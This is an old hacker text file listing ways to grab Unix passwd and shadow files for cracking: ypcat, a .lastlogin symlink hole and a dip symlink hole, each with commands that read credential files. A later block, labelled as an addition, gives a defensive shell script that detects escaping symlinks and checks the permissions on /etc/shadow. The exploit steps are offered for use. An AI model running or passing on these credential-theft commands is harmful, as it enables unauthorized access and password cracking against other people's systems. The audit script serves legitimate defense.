- This is by no means a complete or even good list of possible ways to get a copy of the shadow file, but it's some that work and
- are pretty handy to know if you do a lot of freelance cracking.
-
- Unix including: SunOS, SCO, System V, and others like them are sometimes vulnerable to ypcat. This is an old and
- well-known trick, but it works. To use it, simply type ypcat /etc/passwd with your capture option turned on, or use
-
- ypcat /etc/passwd > ~/passwd
-
- and download the passwd file from your home dir.
-
- Unix including: SCO, System V 3.2, ?, could be vulnerable to a hole using the .lastlogin file. In your home directory, if
- ls -al shows .lastlogin to be owned by auth or root or anyone with better security than you, it's good :)
- To exploit:
-
- rm -f ~/.lastlogin
- ln -s ~/.lastlogin /etc/passwd
-
- Now log out and back in so that the link gets created.
-
- cat .lastlogin > passwd
- rm -f ~/.lastlogin
-
- This hole could have several other uses as well; the fact that it allows you read access to most any file on the system is a
- nice gift.
-
- Linux including: Slackware, ?, not only can the dip hole be used to exploit root, but it can also snag you the shadow file
- fairly easily. Why you wouldn't use it to get to root and then just edit/download it I have no clue, but here it is anyway.
- To exploit:
-
- ln -s /etc/shadow /tmp/dummy.dip
- /sbin/dip -v /tmp/dummy.dip
-
- Assuming dip is vulnerable, this should type the shadow file for you, and of course it's not limited to just reading the
- shadow file.
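- Both the .lastlogin and the dip tricks depend on the same condition: a privileged program following a symlink that a user
- planted in a directory they control. The script below is an added example, not part of the original text, that an admin can
- run to spot that condition: escaped_symlinks lists every symlink under a directory whose target resolves outside that
- directory, and not_world_readable confirms a file such as /etc/shadow has no "other" read bit. Both function names and the
- sample paths in the usage comment are assumptions chosen here.

```sh
#!/bin/sh
# Added audit helpers (example code, not from the original text).
#   escaped_symlinks DIR  - prints "link -> target" for each symlink under DIR
#                           whose target resolves outside DIR; a root-owned
#                           file in a user-writable tree that turns out to be a
#                           link elsewhere is the thing to follow up on.
#   not_world_readable F  - succeeds only if F exists and has no "other" read
#                           bit, the minimum /etc/shadow should satisfy.
# Both names are hypothetical; adjust the paths in the usage comment as needed.

escaped_symlinks() {
    dir=$1
    base=$(cd "$dir" && pwd -P) || return 1
    find "$dir" -type l 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        # Make the target absolute, relative to the link's own directory
        case $target in
            /*) resolved=$target ;;
            *)  resolved=$(dirname "$link")/$target ;;
        esac
        # Canonicalise targets that exist; dangling links keep their literal path
        if [ -e "$resolved" ]; then
            resolved=$(cd "$(dirname "$resolved")" && pwd -P)/$(basename "$resolved")
        fi
        case $resolved in
            "$base"/*) ;;                                   # stays inside DIR
            *) printf '%s -> %s\n' "$link" "$resolved" ;;   # escapes DIR: report
        esac
    done
}

not_world_readable() {
    [ -e "$1" ] || return 1
    # Column 8 of "ls -ld" output is the "other" read bit; portable across Unix flavours
    [ "$(ls -ld "$1" | cut -c8)" != r ]
}

# Usage (paths are examples): audit each home directory and check the shadow file
#   for h in /home/*; do escaped_symlinks "$h"; done
#   not_world_readable /etc/shadow || echo "/etc/shadow is world-readable"
```

- Run it from cron or after any account change; a link such as ~/.lastlogin or /tmp/dummy.dip pointing at /etc is exactly what
- the first function reports, and a non-zero exit from the second means the shadow file offers no protection over /etc/passwd.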
-
- If you know of other tricks, especially some that defeat Linux shadow, and wish to share them, mail Cassidy.